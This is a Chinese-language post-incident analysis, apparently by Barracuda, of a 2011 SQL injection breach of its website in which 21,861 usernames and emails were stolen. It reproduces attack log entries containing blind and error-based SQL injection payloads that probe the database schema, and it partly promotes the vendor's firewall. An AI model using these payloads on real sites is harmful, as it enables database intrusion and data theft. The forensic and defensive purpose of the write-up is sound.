使用梭子魚Web應(yīng)用防火墻報(bào)告的信息,我們能夠迅速在Web服務(wù)器日志上過濾并查找到相應(yīng)的記錄條目。

2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=99%20and%20”x”=”x 80 – 87.1

2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=98%20and%20”x”=”x 80 – 87.1

2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=97%20and%20”x”=”x 80 – 87.1

2011-04-10 03:19:19 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:21 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:24 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:26 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:28 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:31 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:32 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:33 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:37 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:39 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:41 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:46 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

2011-04-10 03:19:49 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

2011-04-10 03:19:52 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info

2011-04-10 03:19:55 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

注:Web 日志使用的是格林威治標(biāo)準(zhǔn)時(shí)間(GMT),而 Web 應(yīng)用防火墻使用的是太平洋夏令時(shí)(PDT)

通過仔細(xì)查看梭子魚Web 應(yīng)用防火墻的每個(gè)日志條目,我們找到了攻擊者及其所用工具的線索:

梭子魚Web應(yīng)用防火墻

發(fā)現(xiàn)漏洞

第一次攻擊的開始時(shí)間為4月9日下午5:07,攻擊者的IP地址為 115.134.249.15,來自馬來西亞的吉隆坡,該日志條目證實(shí)了認(rèn)為攻擊來自馬來西亞的在線報(bào)告。我們還注意到,攻擊者用以探測(cè) Web 網(wǎng)站SQL 注入缺陷的是White hats設(shè)計(jì)的滲透工具的一個(gè)修改版;相關(guān)的日志條目報(bào)告顯示,負(fù)責(zé)此次攻擊的黑客團(tuán)隊(duì)頻繁進(jìn)入White hat在線社區(qū)。我們?cè)赪eb 服務(wù)器日志上也發(fā)現(xiàn)了相似的條目。這些日志條目還讓我們跟蹤到攻擊者嘗試了哪些攻擊以及在我們的后臺(tái)系統(tǒng)上成功進(jìn)行了哪些攻擊。

ex11041000.log:2011-04-10 00:17:18 GET /ns/customers/customer_verticals.php v=11 80 – 115.134.249.155 Mozilla/4.0+(compatible;+MSIE+7.0;+W

ex11041000.log:2011-04-10 00:17:20 GET /ns/customers/customer_verticals.php v=-9.9 80 – 115.134.249.155 Mozilla/4.0+(compatible;+MSIE+7.0;+

ex11041000.log:2011-04-10 00:17:22 GET /ns/customers/customer_verticals.php v=11%20and%201=1 80 – 115.134.249.155 Mozilla/4.0+(compatibl

ex11041000.log:2011-04-10 00:17:24 GET /ns/customers/customer_verticals.php v=11%20and%201=0 80 – 115.134.249.155 Mozilla/4.0+(compatibl

ex11041000.log:2011-04-10 00:17:25 GET /ns/customers/customer_verticals.php v=11’%20and%20’x’=’x 80 – 115.134.249.155 Mozilla/4.0+(compati

注:Web 日志使用的是格林威治標(biāo)準(zhǔn)時(shí)間(GMT),而 Web 應(yīng)用防火墻使用的是太平洋夏令時(shí)(PDT)

我們現(xiàn)在知道,第一個(gè)攻擊者使用自動(dòng)工具逐步遍歷網(wǎng)站,并對(duì)每個(gè)允許輸入的參數(shù)項(xiàng)注入一系列 SQL 命令,查找可能的漏洞。SQL 注入工具于下午 5:16 找到了第一個(gè)漏洞,但沒有繼續(xù)深入該網(wǎng)頁;下午 8:10,IP地址為 87.106.220.57 的第二個(gè)客戶端加入了攻擊行列。經(jīng)追蹤發(fā)現(xiàn),第二個(gè)IP地址的服務(wù)器在德國(guó),但尚不清楚該服務(wù)器是一個(gè)代理,還是第二個(gè)攻擊者。梭子魚WAF同樣記錄下了來自第二個(gè)IP地址的活動(dòng)。

以下是相應(yīng)的 Web 服務(wù)器日志:

2011-04-10 03:14:11 GET /ns/customers/customer_verticals.php v=12”%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,

2011-04-10 03:14:11 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:14:12 GET /ns/customers/customer_verticals.php v=12”%20and(select%201%20from(select%20count(*),concat((select%20(select%2

2011-04-10 03:14:12 GET /ns/customers/customer_verticals.php v=12”%20and(select%201%20from(select%20count(*),concat((select%20(select%2

2011-04-10 03:14:14 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%

2011-04-10 03:14:14 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((database()))<32%20and%20”x”=”x 80 - 87.106.220.57 M

2011-04-10 03:14:15 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((database()))<16%20and%20”x”=”x 80 - 87.106.220.57 M

注:Web 日志使用的是格林威治標(biāo)準(zhǔn)時(shí)間(GMT),而 Web 應(yīng)用防火墻使用的是太平洋夏令時(shí)(PDT)

從梭子魚Web應(yīng)用防火墻的日志發(fā)現(xiàn),攻擊者似乎利用了第二個(gè)客戶端對(duì)已發(fā)現(xiàn)的漏洞進(jìn)行了手動(dòng)攻擊,而主要攻擊仍然集中在繼續(xù)對(duì)Web 站點(diǎn)進(jìn)行掃描,以獲取其它漏洞。最終,攻擊者們集中力量攻擊非主頁的一個(gè)WEB 頁面上的一行弱代碼,其輸入?yún)?shù)并未進(jìn)行控制審查。以下是那段代碼:

//獲得用戶輸入

因未對(duì)輸入值進(jìn)行限定,該代碼錯(cuò)誤讓攻擊者們得以向 HTML的輸入?yún)?shù)進(jìn)行注入 SQL 命令來攻擊后臺(tái)數(shù)據(jù)庫(kù)。

網(wǎng)站開發(fā)者們被告知絕對(duì)不要信任用戶的輸入;所有的用戶輸入在發(fā)送到后臺(tái)服務(wù)器之前必須進(jìn)行審查。然而,通過上述案例,你可以發(fā)現(xiàn)僅僅用眼睛很難發(fā)現(xiàn)所有的代碼錯(cuò)誤。這就是為什么除了必要的防范性代碼設(shè)計(jì)以外,梭子魚公司還使用漏洞掃描工具和Web應(yīng)用防火墻設(shè)備來為可能的缺陷提供保護(hù)。由于自動(dòng)式掃描攻擊的存在,在一個(gè)含有成千上萬條代碼的 Web 站點(diǎn)中,只要有一個(gè)簡(jiǎn)單的錯(cuò)誤就能讓攻擊得逞。我們添加了一條代碼,對(duì)受影響的頁面上的輸入進(jìn)行限定審查,以保護(hù)未來的可能攻擊。

$parameter = @is_sanitized($_GET[‘parameter’]) ? $_GET[‘ parameter ‘] : 0;

從漏洞到數(shù)據(jù)泄露

攻擊者們發(fā)現(xiàn)了存在漏洞的頁面后,就企圖竊取數(shù)據(jù)庫(kù)用戶賬號(hào)。在接下來的 10個(gè)小時(shí)里,攻擊者們嘗試了數(shù)種方法來強(qiáng)行闖入后臺(tái)數(shù)據(jù)庫(kù),但是每次都以失敗告終。上午3:06,攻擊者們改變了策略,集中攻擊后臺(tái)數(shù)據(jù)庫(kù) Schema。事實(shí)證明,這是個(gè)有效的決定。到 3:19am,攻擊者們已經(jīng)竊取了第一批電子郵箱賬號(hào)。

網(wǎng)站管理員在10:30am 發(fā)現(xiàn)網(wǎng)站被攻擊,并于10:39am將梭子魚Web應(yīng)用防火墻切換到ACTIVE模式開啟保護(hù),阻止了來自 IP 地址為 115.134.249.15 的所有后續(xù)攻擊。接下來的數(shù)小時(shí)里,攻擊者們繼續(xù)對(duì)剩下的 Web 頁面進(jìn)行定時(shí)攻擊,從梭子魚Web應(yīng)用防火墻設(shè)備將所有這些攻擊拒之門外。從攻擊文件證實(shí)了我們的結(jié)論,即:攻擊者們使用了一種自動(dòng)掃描滲透工具,大范圍地注入 SQL 命令。最終,攻擊者們從兩個(gè)攻擊IP地址總共對(duì) 175 個(gè)URL 發(fā)送了 110,892 個(gè) SQL 注入式命令,其頻率為每分鐘 42次。

我們?cè)谧粉櫵笞郁~Web應(yīng)用防火墻上的防火墻日志和訪問日志時(shí),確定攻擊者們竊取了市場(chǎng)部數(shù)據(jù)庫(kù)中的兩套記錄,包含 21,861 個(gè)用戶名和電子郵件記錄。因?yàn)檫@兩套記錄還存在副本,并且當(dāng)中有許多用戶已離開原先的公司,所以受影響的用戶數(shù)比被竊取記錄的總數(shù)要小得多。

任何數(shù)據(jù)泄露都是嚴(yán)重的問題。盡管實(shí)施這次攻擊的黑客們似乎并無惡意,但是類似的泄漏數(shù)據(jù),可能被用來對(duì)受影響的用戶進(jìn)行釣魚攻擊。

結(jié)論

無論是從事前還是事后的角度來分析,這次攻擊更像是一次攻防演練;通過這次事件,我們更確信,梭子魚Web應(yīng)用防火墻設(shè)備能夠?yàn)榫W(wǎng)站提供對(duì)包括 SQL注入在內(nèi)的各種攻擊的防護(hù)。雖然網(wǎng)頁中包含PHP代碼漏洞,但只要開啟梭子魚Web應(yīng)用防火墻的防護(hù)功能,所有的攻擊都在幾秒鐘內(nèi)都被阻止。而且,梭子魚Web應(yīng)用防火墻的日志和報(bào)告提供了完整的攻擊記錄以及失竊數(shù)據(jù)的記錄,從而為分析和研究Web應(yīng)用安全提供了一個(gè)很好的案例。為了保障網(wǎng)站的安全,在編寫高質(zhì)量的代碼和進(jìn)行漏洞測(cè)試的同時(shí),梭子魚Web應(yīng)用防火墻設(shè)備應(yīng)該成為防御應(yīng)用層攻擊的第一道防線。

分享到

huanghui

相關(guān)推薦